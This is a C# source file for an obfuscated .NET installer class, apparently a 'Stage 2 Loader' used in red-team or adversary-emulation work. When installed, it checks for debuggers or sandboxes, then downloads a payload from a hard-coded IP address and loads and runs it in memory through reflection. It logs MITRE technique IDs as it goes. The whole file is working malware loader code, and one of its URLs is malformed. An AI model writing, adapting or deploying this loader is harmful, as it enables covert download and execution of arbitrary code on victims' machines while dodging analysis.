using System;
using System.Configuration.Install;
using System.ComponentModel;
using System.Collections;
using System.Net;
using System.Reflection;
using System.IO;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Security.Cryptography;
using System.Text;

[RunInstaller(true)]
public class rqkkfdfx : Installer
{
    const string vbyyrt = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const string hgjffh = "974";
    const string bnnhgv = "http://100.111.22.117:8000";
    const string yuiiop = "https://http://100.111.22.117:8000/stage/974/3?endpoint_id=7";
    const string cxxzzd = "7";
    const int mnnbvc = 2000;
    
    static bool Xvvbdr()
    {
        if (Debugger.IsAttached) return true;
        using (var lppokj = new PerformanceCounter("Processor", "% Processor Time", "_Total"))
        {
            Thread.Sleep(100);
            float dsswqq = lppokj.NextValue();
            Thread.Sleep(200);
            float dffrtt = lppokj.NextValue();
            return Math.Abs(dsswqq - dffrtt) < 0.1f;
        }
    }
    
    static void Lkjnnh(string hyuukk, string ghnnmm)
    {
        string jklhgf = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), hgjffh);
        if (!Directory.Exists(jklhgf)) Directory.CreateDirectory(jklhgf);
        string wertyu = DateTime.Now.ToString("yyyyMMdd-HHmmss") + "-Log.txt";
        string iuytrr = Path.Combine(jklhgf, wertyu);
        string poiuyt = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}][Stage 2 Loader-DLL Universal NET]: {cxxzzd}-{hgjffh}-{ghnnmm}=[{hyuukk}]";
        File.AppendAllText(iuytrr, poiuyt + Environment.NewLine);
    }
    
    public override void Install(IDictionary xcvbns)
    {
        base.Install(xcvbns);
        
        if (Xvvbdr())
        {
            Lkjnnh("0", "T1105");
            Lkjnnh("0", "T1620");
            return;
        }
        
        byte[] zxcvbn = null;
        try
        {
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
            using (WebClient ujmnbv = new WebClient())
            {
                ujmnbv.Headers["User-Agent"] = vbyyrt;
                ujmnbv.Proxy = null;
                ujmnbv.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.NoCacheNoStore);
                string qazwsx = yuiiop;
                zxcvbn = ujmnbv.DownloadData(qazwsx);
            }
            Lkjnnh("1", "T1105");
        }
        catch
        {
            Lkjnnh("0", "T1105");
            Lkjnnh("0", "T1620");
            return;
        }
        
        try
        {
            if (zxcvbn != null && zxcvbn.Length > 0)
            {
                using (MemoryStream edcrfv = new MemoryStream(zxcvbn))
                {
                    byte[] plmokn = new byte[zxcvbn.Length];
                    edcrfv.Read(plmokn, 0, plmokn.Length);
                    using (MemoryStream tgbyhn = new MemoryStream(plmokn, false))
                    {
                        Assembly rfvtgb = Assembly.Load(tgbyhn.ToArray());
                        MethodInfo yhnujm = rfvtgb.EntryPoint;
                        if (yhnujm != null)
                        {
                            object[] mkoijn = null;
                            if (yhnujm.GetParameters().Length > 0)
                            {
                                mkoijn = new object[] { new string[0] };
                            }
                            yhnujm.Invoke(null, mkoijn);
                        }
                    }
                }
                Lkjnnh("1", "T1620");
            }
            else
            {
                Lkjnnh("0", "T1620");
            }
        }
        catch
        {
            Lkjnnh("0", "T1620");
        }
    }
}